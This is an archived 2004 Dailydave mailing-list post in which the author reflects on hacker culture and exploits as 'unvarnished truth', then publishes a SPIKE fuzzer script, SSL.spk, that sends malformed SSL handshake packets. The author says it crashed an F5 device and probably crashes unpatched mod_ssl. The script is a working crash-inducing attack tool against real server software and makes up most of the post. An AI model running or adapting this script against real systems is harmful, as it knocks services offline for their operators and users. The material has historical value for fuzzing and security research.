|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Dailydave] A shard of glass left on the bathroom floor from a light that broke long ago
From: Dave Aitel (dave
immunitysec.com)
Date: Wed Jan 14 2004 - 22:16:38 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hackers have an oral history, but it's written down, fragmented into
mailing list posts and the headers of various exploits and tools, passed
from person to person like the precious artworks they are. A lot of
exploits are released to the public as punctuation - a way to say "Even
though I'm young enough to get carded, don't drive an Audi to work every
morning, don't know the difference between UML and a hole in the ground,
don't have a business plan, ten million of VC, three software patents
and my face on TV, I still can tell when you're full of it."
I once read a poem in a Virginia Tech magazine that ended with "Tell the
truth and it will be beautiful no matter what." In some way, I feel this
way with exploits. A good exploit is the unvarnished truth, and
beautiful in that regard.
But this little piece of code isn't meant to be beautiful. I'm posting
this just to say to all the hackers and "security professionals" trading
in their minds for their lives that there are still free voices out
there. That working like a slave so that you can buy a house in a boston
suburb may be the easy path, but it's not the only path.
//SSL.spk - crashed an F5, probably crashes mod_ssl (unpatched). Useful
for demonstrating
//that 20 minutes and a copy of SPIKE 2.9 is sometimes better than a
truckload of government
//contractors.
s_binary("80"); //???
s_binary_block_size_byte_variable("Hello");
s_block_start("Hello");
s_binary("01"); //hello message
s_binary("03 01"); //version 0301
s_binary_block_size_halfword_bigendian_variable("cypher_spec_length");
s_binary_block_size_halfword_bigendian_variable("session_id_length");
s_binary_block_size_halfword_bigendian_variable("challenge_length");
s_block_start("cypher_spec_length");
s_binary("00000a");
s_string_variable("");
s_block_end("cypher_spec_length");
s_block_start("challenge_length");
s_string_variable("challengchallengchallengchalleng");
s_block_end("challenge_length");
s_block_end("Hello");
//NEXT PACKET
s_binary("22");
s_binary("0301");
s_binary_block_size_halfword_bigendian_variable("length2");
s_block_start("length2");
s_binary("10"); //client key exchange
s_binary("00"); //pad
s_binary_block_size_halfword_bigendian_variable("handshake_length");
s_block_start("handshake_length");
s_string_variable("keykkeyk");
s_block_end("handshake_length");
s_block_end("length2");
s_binary("14"); //change cypher
s_binary("0301");
s_binary_block_size_halfword_bigendian_variable("length3");
s_block_start("length3");
s_binary("01");
s_string_variable("");
s_block_end("length3");
s_binary("16"); //encrypted handshake method
s_binary("0301"); //version
s_binary_block_size_halfword_bigendian_variable("length4");
s_block_start("length4");
s_string_variable("hihihihihihihihi");
s_block_end("length4");
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]